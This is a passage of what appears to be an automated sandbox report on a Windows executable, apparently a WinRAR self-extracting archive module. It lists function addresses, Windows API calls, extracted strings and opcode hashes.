Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
Instruction ID: 046b4c301110153c708e52834f42ea83676ae8ce258209dc63e52c05bc565632
Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
Instruction Fuzzy Hash: B0F0FE65F1C09342FB680E2C581933912769B1131BF5488B5E39FE62C5DDADE8815109

Function 00007FF6CCCB3354 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction ID: aa278aac9b93c8501cb7d93cc89aa67d0a472f7869bf6a6648fcb919ec189225
Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction Fuzzy Hash: 8FA0026190CCC2D0E6449F50E8B44722330FF60702B581031F2ADC10A4DF3CA402C304

Function 00007FF6CCC8D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8D964

Strings

::$INDEX_ALLOCATION, xrefs: 00007FF6CCC8D83E
:$I30:$INDEX_ALLOCATION, xrefs: 00007FF6CCC8D849
:$EFS:$LOGGED_UTILITY_STREAM, xrefs: 00007FF6CCC8D86A
::$LOGGED_UTILITY_STREAM, xrefs: 00007FF6CCC8D85F
::$ATTRIBUTE_LIST, xrefs: 00007FF6CCC8D7FC
::$OBJECT_ID, xrefs: 00007FF6CCC8D880
::$EA_INFORMATION, xrefs: 00007FF6CCC8D828
::$BITMAP, xrefs: 00007FF6CCC8D807
::$DATA, xrefs: 00007FF6CCC8D812
::$REPARSE_POINT, xrefs: 00007FF6CCC8D88B
:$TXF_DATA:$LOGGED_UTILITY_STREAM, xrefs: 00007FF6CCC8D875
::$FILE_NAME, xrefs: 00007FF6CCC8D833
::$EA, xrefs: 00007FF6CCC8D81D
::$INDEX_ROOT, xrefs: 00007FF6CCC8D854

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
API String ID: 3668304517-727060406
Opcode ID: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
Instruction ID: 3d40374e999eb863d85066b8317442312bde36b2ed2b2eae2ab963cd13a49413
Opcode Fuzzy Hash: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
Instruction Fuzzy Hash: B341E936B05F8299EB009F65E4903EA33B9EB58799F400136DB8C83B58EF38D555C340

Function 00007FF6CCCB2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6CCCB2A26
GetModuleHandleW.KERNEL32 ref: 00007FF6CCCB2A33
GetModuleHandleW.KERNEL32 ref: 00007FF6CCCB2A48
GetProcAddress.KERNEL32 ref: 00007FF6CCCB2A60
GetProcAddress.KERNEL32 ref: 00007FF6CCCB2A73
CreateEventW.KERNEL32 ref: 00007FF6CCCB2A9F
DeleteCriticalSection.KERNEL32 ref: 00007FF6CCCB2AEB
CloseHandle.KERNEL32 ref: 00007FF6CCCB2AFD

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF6CCCB2A2C
SleepConditionVariableCS, xrefs: 00007FF6CCCB2A56
WakeAllConditionVariable, xrefs: 00007FF6CCCB2A66
kernel32.dll, xrefs: 00007FF6CCCB2A41

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction ID: 03e46207fba6cdd089ac56b3979137bc0aec5b667e4a26510d2e21e6a337933c
Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction Fuzzy Hash: B421EC64E19A8381FA55AF95ECA517933B0AF58B83F484435CB9EC26A4DE3CE585C300

Function 00007FF6CCC96A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC970A6

Part of subcall function 00007FF6CCC82004: std::_Xinvalid_argument.LIBCPMT ref: 00007FF6CCC8200F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC970B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC970B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC970C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC970D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC970DC

Strings

UNC, xrefs: 00007FF6CCC96BBF
\\?\, xrefs: 00007FF6CCC96A57, 00007FF6CCC96A66
DXGIDebug.dll, xrefs: 00007FF6CCC96A18

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: DXGIDebug.dll$UNC$\\?\
API String ID: 4097890229-4048004291
Opcode ID: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
Instruction ID: 841dc7444ea2e568f19c36c2a101eb3ea5923931c3eb663bd3bbc81e664530d5
Opcode Fuzzy Hash: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
Instruction Fuzzy Hash: 6012DD22F09B8280EB10DF65E4541AE6371EB81B99F505236DB9D87BE9DF3CE54AC340

Function 00007FF6CCCAA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC8129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCC81396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA72F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA735
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA73B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA741
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA747
EndDialog.USER32 ref: 00007FF6CCCAA7BA

Strings

GETPASSWORD1, xrefs: 00007FF6CCCAA773
Software\WinRAR SFX, xrefs: 00007FF6CCCAA52B, 00007FF6CCCAA53A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 431506467-1315819833
Opcode ID: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
Instruction ID: 466f5aeb5f1aa7dc2e40d0a78cb4ff6e2f53702d8563a201f59e1a3ec8fb593c
Opcode Fuzzy Hash: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
Instruction Fuzzy Hash: 50B1C062F18BC285FB00DFA4D4582BD2372AB85795F404236DF9CA6AD9DE3CE496C740

Function 00007FF6CCCBE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCBE7CD

Strings

nan(snan), xrefs: 00007FF6CCCBE6F0
INF, xrefs: 00007FF6CCCBE6C3
NAN, xrefs: 00007FF6CCCBE6B1
NAN(SNAN), xrefs: 00007FF6CCCBE6E5
inf, xrefs: 00007FF6CCCBE6D6
nan, xrefs: 00007FF6CCCBE6B8
nan(ind), xrefs: 00007FF6CCCBE706
NAN(IND), xrefs: 00007FF6CCCBE6FB

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction ID: 25a519eb8c2c5c16827ec803b67013fdbd4739af024365b5f16096fbbe33f411
Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction Fuzzy Hash: E341A972A0AB8589EB04CF65E8517E933B4EB18798F01423AEF9D87B94DE3CD025C344

Function 00007FF6CCCAF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF6CCCAF3CF
GetClassNameW.USER32 ref: 00007FF6CCCAF3FC
GetWindowLongPtrW.USER32 ref: 00007FF6CCCAF41D
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF437
GetObjectW.GDI32 ref: 00007FF6CCCAF452
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF487
DeleteObject.GDI32 ref: 00007FF6CCCAF490
GetWindow.USER32 ref: 00007FF6CCCAF49E

Strings

STATIC, xrefs: 00007FF6CCCAF402

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Window$ButtonCheckedObject$ClassDeleteLongName
String ID: STATIC
API String ID: 781704138-1882779555
Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction ID: 7784d113444235d3e2854b4ba19da4f16d1af4edef4d42a65e8a074bf1303fc9
Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction Fuzzy Hash: 0B318126B086C286FB609F12A5597B963B1BFC9BC2F040434DF8D87B56DE3CE4468740

Function 00007FF6CCCA6E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CCCA7E9B), ref: 00007FF6CCCA7080
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA717B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA7181
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA7187

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF6CCCA6F2C, 00007FF6CCCA6F3B
</html>, xrefs: 00007FF6CCCA6F72, 00007FF6CCCA6F81
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF6CCCA6ED5, 00007FF6CCCA6EE4
<html>, xrefs: 00007FF6CCCA6F13

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2721297748-1533471033
Opcode ID: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
Instruction ID: e6d997c2883ea38787422bad69b71eed5b51eee2caef29f75976da4843bfd64f
Opcode Fuzzy Hash: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
Instruction Fuzzy Hash: B581B162F18A8285FB00DFA5D8542ED2371AF88799F401136CF9D976DAEE3CD51AC340

Function 00007FF6CCCAAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF6CCCAAEAE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Item$Text
String ID: LICENSEDLG
API String ID: 1601838975-2177901306
Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
Instruction ID: ee6479674f19b99843b459c85fd744de8a73ae7c1985672c60bd9092240bcd87
Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
Instruction Fuzzy Hash: 16418071A086D282FB549F12A85977923B1AF99F82F044039DB8E83B95CF3CE5868744

Function 00007FF6CCC9B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6CCC9BA12
GetProcAddress.KERNEL32 ref: 00007FF6CCC9BA2D
GetCurrentProcessId.KERNEL32 ref: 00007FF6CCC9BACA

Part of subcall function 00007FF6CCC9DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF6CCC9DDDF

Strings

CryptUnprotectMemory failed, xrefs: 00007FF6CCC9BAC1
CryptProtectMemory, xrefs: 00007FF6CCC9BA08
CryptUnprotectMemory, xrefs: 00007FF6CCC9BA1F
Crypt32.dll, xrefs: 00007FF6CCC9B9F0
CryptProtectMemory failed, xrefs: 00007FF6CCC9BA80

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction ID: 05350dc80e831ac0c26d7200ce9701652b6feec4e58991a207397275ef23fe94
Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction Fuzzy Hash: 2F317C20E19BC790FA24AF11B9A117A73B0AF55B96F040135DBCEC37A4DE7CE5918340

Function 00007FF6CCCA87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA8DB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA8DC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA8DCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA8DDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA8DE0

Strings

, xrefs: 00007FF6CCCA88BE
, xrefs: 00007FF6CCCA8A55

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: f030c4eb17d52201791ace9f286aabb5ba9f942de39f9151f6af03753080fb30
Instruction ID: e96caaa02bf70df6d78540f6fc3fff7c0784e885eba3f6574830409acc99d4e3
Opcode Fuzzy Hash: f030c4eb17d52201791ace9f286aabb5ba9f942de39f9151f6af03753080fb30
Instruction Fuzzy Hash: C0F1E162F15B8682EF049F64D4881BD2371AB84BA9F505231CBAD97BD9DF7CE092C340

Function 00007FF6CCCB57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6CCCB598A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CCCB5CAD
abort.LIBCMT ref: 00007FF6CCCB5CE1

Strings

csm, xrefs: 00007FF6CCCB58D1
csm, xrefs: 00007FF6CCCB59B1
csm, xrefs: 00007FF6CCCB5933

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction ID: 08eadd4d4b14a53a10cde62aed0943c0071a60a836ce66cbfa31734a222e2fbf
Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction Fuzzy Hash: FFE19E72A08BC28AE7219FA5D4A13AD77B0FB45759F140136DBCD97A96CF38E485CB00

Function 00007FF6CCC94F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC94E24: SysAllocString.OLEAUT32 ref: 00007FF6CCC94E5F

VariantClear.OLEAUT32 ref: 00007FF6CCC95125

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF6CCC95017
WQL, xrefs: 00007FF6CCC9502A
ROOT\CIMV2, xrefs: 00007FF6CCC94F7B
Windows 10, xrefs: 00007FF6CCC9510A
Name, xrefs: 00007FF6CCC950F9

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AllocClearStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 1959693985-3505469590
Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction ID: f129d73acf816a72fc8527b46a58179f8ce8fc338c7cb36928e0faae9040abd4
Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction Fuzzy Hash: 38713A36A14B9585EB20DF25E8905AD77B4FB88B99B445236EF8E83B68CF3CD144C300

Function 00007FF6CCCB72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6CCCB74F3,?,?,?,00007FF6CCCB525E,?,?,?,00007FF6CCCB5219), ref: 00007FF6CCCB7371
GetLastError.KERNEL32(?,?,00000000,00007FF6CCCB74F3,?,?,?,00007FF6CCCB525E,?,?,?,00007FF6CCCB5219), ref: 00007FF6CCCB737F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6CCCB74F3,?,?,?,00007FF6CCCB525E,?,?,?,00007FF6CCCB5219), ref: 00007FF6CCCB73A9
FreeLibrary.KERNEL32(?,?,00000000,00007FF6CCCB74F3,?,?,?,00007FF6CCCB525E,?,?,?,00007FF6CCCB5219), ref: 00007FF6CCCB73EF
GetProcAddress.KERNEL32(?,?,00000000,00007FF6CCCB74F3,?,?,?,00007FF6CCCB525E,?,?,?,00007FF6CCCB5219), ref: 00007FF6CCCB73FB

Strings

api-ms-, xrefs: 00007FF6CCCB7391

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

